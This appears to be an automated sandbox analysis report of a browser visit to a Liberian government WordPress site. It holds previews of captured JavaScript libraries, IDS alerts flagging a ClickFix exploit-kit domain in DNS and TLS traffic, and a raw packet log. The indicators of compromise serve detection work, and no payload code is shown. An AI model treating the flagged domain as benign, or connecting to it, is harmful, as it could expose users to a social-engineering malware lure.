                                                                                                                        Preview:/*! jQuery Migrate v3.4.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */."undefined"==typeof jQuery.migrateMute&&(jQuery.migrateMute=!0),function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],function(e){return t(e,window)}):"object"==typeof module&&module.exports?module.exports=t(require("jquery"),window):t(jQuery,window)}(function(s,n){"use strict";function e(e){return 0<=function(e,t){for(var r=/^(\d+)\.(\d+)\.(\d+)/,n=r.exec(e)||[],o=r.exec(t)||[],a=1;a<=3;a++){if(+o[a]<+n[a])return 1;if(+n[a]<+o[a])return-1}return 0}(s.fn.jquery,e)}s.migrateVersion="3.4.1";var t=Object.create(null);s.migrateDisablePatches=function(){for(var e=0;e<arguments.length;e++)t[arguments[e]]=!0},s.migrateEnablePatches=function(){for(var e=0;e<arguments.length;e++)delete t[arguments[e]]},s.migrateIsPatchEnabled=function(e){return!t[e]},n.console&&n.console.log&&(s&&e("3.0.0")&&!e("5.0.0")||n.console.log("JQMIGRATE: jQuery 3.x-4.x REQUIRED"),s.migrateWarnings
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (350)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):472
                                                                                                                        Entropy (8bit):4.970780282209864
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:UolIf2SbpMZixuLsLCTQVlqIEkDAXUIEZ6DAG1/QC5e5TAUXyn:luNW8SsLe9ILAXUIggAGVQC5/Yyn
                                                                                                                        MD5:6CBC17C595BAEC9068F58EEF5F001410
                                                                                                                        SHA1:3A1B22A742CF6B54C47D639C06351D1B3121ACD9
                                                                                                                        SHA-256:7C5A0E187E68CCBF13DAFD079E2C46C7917CC60B6959E5A881DA324958F34D92
                                                                                                                        SHA-512:1267060AE19854908634643355FCFA25A93988F2C2B3FE36BAB4D70227D4A0C42DADC1E3869D1A83A9E369870A3DF06758CAB5EE652917A773A727AF513950E5
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/plugins/debouncedresize.min.js?ver=27.0.7
                                                                                                                        Preview:/**. * Resize. * debouncedresize. * https://github.com/louisremi/jquery-smartresize | Licensed under the MIT license.. */.(function(e){var t=e.event,n,r;n=t.special.debouncedresize={setup:function(){e(this).on("resize",n.handler)},teardown:function(){e(this).off("resize",n.handler)},handler:function(e,i){var s=this,o=arguments,u=function(){e.type="debouncedresize";t.dispatch.apply(s,o)};if(r){clearTimeout(r)}i?u():r=setTimeout(u,n.threshold)},threshold:150}})(jQuery);
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (15752)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):18726
                                                                                                                        Entropy (8bit):4.756109283632968
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:384:WTbvzWuPTb9Uh3o//bEPjXgA2k1efAJmpr:WX6U9Uh3o//YrXgAGfACr
                                                                                                                        MD5:B976B651932BFD25B9DDB5B7693D88A7
                                                                                                                        SHA1:7FCB7CB5C11227F9213B1E08A07D0212209E1432
                                                                                                                        SHA-256:4E6CE5444C7F396CEF0EB1FA3611034151E485DD06FBE5573A5583E1EEBC98C3
                                                                                                                        SHA-512:A241EBDCFAF153D5C2A86761145B2575CBE734B4F416ACBFAC082AE5C6EB7C706BD6CA3BC286B7E1A0F9E326729252DCB95B776750C4A3A0D81F2AA6258EA39F
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! This file is auto-generated */.// Source: wp-includes/js/twemoji.min.js.var twemoji=function(){"use strict";var h={base:"https://cdn.jsdelivr.net/gh/jdecked/twemoji@15.0.3/assets/",ext:".png",size:"72x72",className:"emoji",convert:{fromCodePoint:function(d){d="string"==typeof d?parseInt(d,16):d;if(d<65536)return e(d);return e(55296+((d-=65536)>>10),56320+(1023&d))},toCodePoint:o},onerror:function(){this.parentNode&&this.parentNode.replaceChild(x(this.alt,!1),this)},parse:function(d,u){u&&"function"!=typeof u||(u={callback:u});return h.doNotParse=u.doNotParse,("string"==typeof d?function(d,a){return n(d,function(d){var u,f,c=d,e=N(d),b=a.callback(e,a);if(e&&b){for(f in c="<img ".concat('class="',a.className,'" ','draggable="false" ','alt="',d,'"',' src="',b,'"'),u=a.attributes(d,e))u.hasOwnProperty(f)&&0!==f.indexOf("on")&&-1===c.indexOf(" "+f+"=")&&(c=c.concat(" ",f,'="',u[f].replace(t,r),'"'));c=c.concat("/>")}return c})}:function(d,u){var f,c,e,b,a,t,r,n,o,s,i,l=function d(u,f){v
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (551)
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):227261
                                                                                                                        Entropy (8bit):5.483775665452673
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:vHdwBc2ltglAnjnc5g0Ci0s0LLM+L3Fv+zMqxAKp:vHdYtgkg5gLi0s0LLM+L3FPq6Kp
                                                                                                                        MD5:7204A090B5E030D4C2CD9FF168D00C7A
                                                                                                                        SHA1:B68C14E834050BD237D222F7F8772C8D87EC1BE9
                                                                                                                        SHA-256:1B16FB7B71EB885AB2F0310063BA192F2786F428CD4F52C21596C88CCD8DD848
                                                                                                                        SHA-512:DFD75CC95F1FC5919B7E7EF5430C45E09069E2B0A0D9EA6D5333737CA3FBE297320C067654E54D79A4CACA17E4B413BE5B09E3C55EE835308FF345B533F676AC
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://mc.yandex.ru/metrika/tag.js
                                                                                                                        Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Pa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Pa(u(ba))}.var Of="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Pf;if("function"==typeof Object.setPrototypeOf)Pf=Object.setPrototypeOf;else{var Mh;a:{var Nh={a:!0},Oh={};try{Oh.__proto__=Nh;Mh=Oh.a;break a}catch(ba){}Mh=!1}Pf=Mh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Fm=Pf;.function Gm(ba,ta){ba.prototype=Of(ta.prototype);ba.prototype.constructor=ba;if(Fm)Fm(ba,ta);else for(var $a in ta)if("p
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text, with very long lines (65470)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):642428
                                                                                                                        Entropy (8bit):5.534481975660463
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6144:iNajiG1YOdqCibdPB8c118X1Unf9F9CvU9sT6Q479FwwQPvi6naRq3A7Hpa:ic+skHYW79FlDpa
                                                                                                                        MD5:CE5BD54ADE787E3757D0D32FF267280A
                                                                                                                        SHA1:33DAA933561E55F9988E2BE25448078F97EF0DB2
                                                                                                                        SHA-256:F03340295D792ADB763C777EAA96039AA831C2402BD7CBC970DB44931FA736B8
                                                                                                                        SHA-512:11CA21748CD36A3EE4BCFD3298CDD188AC5A9EF7F01AF8ECAE6A2E15139E2DBB485CD5E04010D479EEB0ADFECBE1B8304A25C66512E2D8094390E4385AB08A62
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:/*! For license information please see web3.min.js.LICENSE.txt */.!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define([],t):"object"==typeof exports?exports.Web3=t():e.Web3=t()}(this,(()=>(()=>{var e={1166:(e,t)=>{"use strict";function r(e){if(Array.isArray(e)){const t=[];let n=0;for(let i=0;i<e.length;i++){const o=r(e[i]);t.push(o),n+=o.length}return h(o(n,192),...t)}const t=g(e);return 1===t.length&&t[0]<128?t:h(o(t.length,128),t)}function n(e,t,r){if(r>e.length)throw new Error("invalid RLP (safeSlice): end slice of Uint8Array out-of-bounds");return e.slice(t,r)}function i(e){if(0===e[0])throw new Error("invalid RLP: extra zeros");return d(u(e))}function o(e,t){if(e<56)return Uint8Array.from([e+t]);const r=p(e),n=p(t+55+r.length/2);return Uint8Array.from(l(n+r))}function s(e,t=!1){if(null==e||0===e.length)return Uint8Array.from([]);const r=a(g(e));if(t)return r;if(0!==r.remainder.length)throw new Error("inva
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (551)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):227261
                                                                                                                        Entropy (8bit):5.483775665452673
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3072:vHdwBc2ltglAnjnc5g0Ci0s0LLM+L3Fv+zMqxAKp:vHdYtgkg5gLi0s0LLM+L3FPq6Kp
                                                                                                                        MD5:7204A090B5E030D4C2CD9FF168D00C7A
                                                                                                                        SHA1:B68C14E834050BD237D222F7F8772C8D87EC1BE9
                                                                                                                        SHA-256:1B16FB7B71EB885AB2F0310063BA192F2786F428CD4F52C21596C88CCD8DD848
                                                                                                                        SHA-512:DFD75CC95F1FC5919B7E7EF5430C45E09069E2B0A0D9EA6D5333737CA3FBE297320C067654E54D79A4CACA17E4B413BE5B09E3C55EE835308FF345B533F676AC
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.(function(){function La(ba){var ta=0;return function(){return ta<ba.length?{done:!1,value:ba[ta++]}:{done:!0}}}function u(ba){var ta="undefined"!=typeof Symbol&&Symbol.iterator&&ba[Symbol.iterator];if(ta)return ta.call(ba);if("number"==typeof ba.length)return{next:La(ba)};throw Error(String(ba)+" is not an iterable or ArrayLike");}function Pa(ba){for(var ta,$a=[];!(ta=ba.next()).done;)$a.push(ta.value);return $a}function Va(ba){return ba instanceof Array?ba:Pa(u(ba))}.var Of="function"==typeof Object.create?Object.create:function(ba){function ta(){}ta.prototype=ba;return new ta},Pf;if("function"==typeof Object.setPrototypeOf)Pf=Object.setPrototypeOf;else{var Mh;a:{var Nh={a:!0},Oh={};try{Oh.__proto__=Nh;Mh=Oh.a;break a}catch(ba){}Mh=!1}Pf=Mh?function(ba,ta){ba.__proto__=ta;if(ba.__proto__!==ta)throw new TypeError(ba+" is not extensible");return ba}:null}var Fm=Pf;.function Gm(ba,ta){ba.prototype=Of(ta.prototype);ba.prototype.constructor=ba;if(Fm)Fm(ba,ta);else for(var $a in ta)if("p
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:PNG image data, 1 x 1, 8-bit gray+alpha, non-interlaced
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):68
                                                                                                                        Entropy (8bit):4.148986922130799
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:yionv//thPlE+tJ8/VeyGFFHDhlljp:6v/lhPfA/0y2Vlljp
                                                                                                                        MD5:2A637D3D825673C0E3462FA4ED9A1C5C
                                                                                                                        SHA1:81668D396DA22832D75A986407FF10035E0D5899
                                                                                                                        SHA-256:69539B5B3777CFFDA28A66D7F2AA9B17C91EE1EC8FD50C00C442AF91753A60F7
                                                                                                                        SHA-512:DC7C40381B3D22919E32C1B700CCB77B1B0AEA2690642D01C1AC802561E135C01D5A4D2A0EA18EFC0EC3362E8C549814A10A23563F1F56BD62AEE0CED7E2BD99
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        Preview:.PNG........IHDR.....................IDAT.Wc``......h&Y.....IEND.B`.
                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                        File Type:ASCII text
                                                                                                                        Category:downloaded
                                                                                                                        Size (bytes):2859
                                                                                                                        Entropy (8bit):4.699901090433241
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:4d27MtM7vuC3h8a6Dl1C3vVmYwvuiafnwvG6ZBMfOjHuzv7optGTMkjvR+R0:DYgk/bCfIWaLGvGuJu0
                                                                                                                        MD5:9273AFB5226060534F29E2EFAD7EAA80
                                                                                                                        SHA1:3AE8AAD16159330A39A83E1068273214A4EECD01
                                                                                                                        SHA-256:E31562BBD4B9F377EEC9662B440B0C1262FF73F7E85C3A6E3639635E4516013F
                                                                                                                        SHA-512:7600D06AC0D586EC3048050876AA123F7F32C6653BA00A90701734D22E49DFA95A902781EDF28552EF3697C6099DA9E9EEE48ED3C52BE9E696495D7154C7B688
                                                                                                                        Malicious:false
                                                                                                                        Reputation:low
                                                                                                                        URL:https://www.lpb.gov.lr/wp-content/themes/betheme/js/menu.js?ver=27.0.7
                                                                                                                        Preview:/**. * MuffinMenu. *. * Horizontal Multilevel Menu with WP MegaMenu Support. * 3.0 | Muffin Group. */..(function($) {.../* globals jQuery */.. "use strict";.. $.fn.mfnMenu = function(options) {.. var menu = $(this);.. var defaults = {. addLast: false,. arrows: false,. delay: 100,. hoverClass: 'hover',. mobileInit: 768,. responsive: true. };. options = $.extend(defaults, options);.. var init = function() {.. // add '.submenu' class.. $('li:has(ul)', menu).addClass('submenu');.. // append mobile toggle button.. $('li:has(ul)', menu).append('<a class="menu-toggle" href="#" role="link" aria-label="'+ mfn.accessibility.translation.toggleSubmenu +'"></a>').on('click', '.menu-toggle', function(e){.. e.preventDefault();.. // FIX | Header Creative dropdown scroll - nicescroll init. if( $('#Header_creative.dropdown.scroll').length ){. $('#Header_creative').css('overflow-y','visible').css('overflow-y'
                                                                                                                        No static file info
                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                        2025-01-10T14:54:55.329509+01002058345ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop)1192.168.2.7558221.1.1.153UDP
                                                                                                                        2025-01-10T14:54:55.329878+01002058345ET EXPLOIT_KIT ClickFix Domain in DNS Lookup (saaadnesss .shop)1192.168.2.7554561.1.1.153UDP
                                                                                                                        2025-01-10T14:55:25.488795+01002058346ET EXPLOIT_KIT ClickFix Domain in TLS SNI (saaadnesss .shop)1192.168.2.749938185.121.235.167443TCP
                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jan 10, 2025 14:54:26.045545101 CET49671443192.168.2.7204.79.197.203
                                                                                                                        Jan 10, 2025 14:54:27.998630047 CET49674443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:28.001969099 CET49675443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:28.170506001 CET49672443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:30.317512035 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:30.686244011 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:30.858017921 CET49671443192.168.2.7204.79.197.203
                                                                                                                        Jan 10, 2025 14:54:31.436172009 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:33.014262915 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:36.014795065 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:37.608242989 CET49674443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:37.608253002 CET49675443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:37.780292988 CET49672443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:38.679336071 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:38.679362059 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:38.679416895 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:38.679626942 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:38.679639101 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.325006008 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.325371981 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:39.325385094 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.326421022 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.326486111 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:39.332851887 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:39.332937002 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.373456001 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:39.373467922 CET44349710142.250.185.68192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:39.420327902 CET49710443192.168.2.7142.250.185.68
                                                                                                                        Jan 10, 2025 14:54:40.274930954 CET44349700104.98.116.138192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.275099039 CET49700443192.168.2.7104.98.116.138
                                                                                                                        Jan 10, 2025 14:54:40.469786882 CET49671443192.168.2.7204.79.197.203
                                                                                                                        Jan 10, 2025 14:54:40.686217070 CET4972380192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.686553001 CET4972480192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.688297033 CET4972580192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.691117048 CET804972369.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.691237926 CET4972380192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.691307068 CET804972469.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.691359043 CET4972480192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.691409111 CET4972380192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.693128109 CET804972569.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:40.693181038 CET4972580192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:40.696242094 CET804972369.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.279920101 CET804972369.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.329483986 CET4972380192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:41.594902039 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:41.594935894 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.594990015 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:41.595645905 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:41.595657110 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:41.968784094 CET49677443192.168.2.720.50.201.200
                                                                                                                        Jan 10, 2025 14:54:42.211513042 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.212630033 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.212647915 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.213826895 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.213956118 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.215203047 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.215277910 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.215517044 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.215523958 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.263849020 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.695847034 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.696391106 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.696402073 CET4434973169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.696459055 CET49731443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.746582985 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.746681929 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:42.746766090 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.747030020 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:42.747062922 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.357767105 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.359991074 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:43.360024929 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.363821030 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.363881111 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:43.365506887 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:43.365586042 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.365719080 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:43.365726948 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:43.420162916 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.096453905 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.096534014 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.096555948 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.096580029 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.096674919 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.096674919 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.096712112 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.139930010 CET49752443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.139975071 CET4434975269.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.140290022 CET49752443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.140290022 CET49752443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.140326977 CET4434975269.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.141588926 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.146787882 CET49753443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.146791935 CET49754443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.146826982 CET44349753151.101.65.229192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.146838903 CET44349754151.101.65.229192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.147783995 CET49755443192.168.2.7104.17.25.14
                                                                                                                        Jan 10, 2025 14:54:44.147794962 CET44349755104.17.25.14192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.147917986 CET49753443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.147921085 CET49754443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.148052931 CET49755443192.168.2.7104.17.25.14
                                                                                                                        Jan 10, 2025 14:54:44.155548096 CET49755443192.168.2.7104.17.25.14
                                                                                                                        Jan 10, 2025 14:54:44.155548096 CET49754443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.155575991 CET44349755104.17.25.14192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.155597925 CET44349754151.101.65.229192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.155870914 CET49753443192.168.2.7151.101.65.229
                                                                                                                        Jan 10, 2025 14:54:44.155896902 CET44349753151.101.65.229192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.166464090 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.166503906 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.166522026 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.166654110 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.166654110 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.182702065 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.183157921 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.183178902 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.183199883 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.183214903 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.183239937 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.183239937 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.183677912 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.184456110 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.185539961 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.185548067 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.187455893 CET49756443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.187501907 CET4434975669.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.187849998 CET49756443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188205004 CET49758443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188211918 CET4434975869.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.188529968 CET49758443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188529968 CET49757443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188529968 CET49759443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188569069 CET4434975769.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.188580990 CET4434975969.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.188646078 CET49759443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.188646078 CET49757443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.189364910 CET49758443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.189364910 CET49756443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.189378977 CET4434975869.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.189392090 CET4434975669.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.189884901 CET49759443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.189884901 CET49757443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.189903975 CET4434975969.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.189918041 CET4434975769.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.225611925 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.236874104 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.236898899 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.236994982 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.237010002 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269366026 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269382954 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269623041 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.269643068 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269865990 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269876003 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269891977 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.269951105 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.269951105 CET49741443192.168.2.769.163.179.33
                                                                                                                        Jan 10, 2025 14:54:44.269959927 CET4434974169.163.179.33192.168.2.7
                                                                                                                        Jan 10, 2025 14:54:44.270082951 CET4434974169.163.179.33192.168.2.7
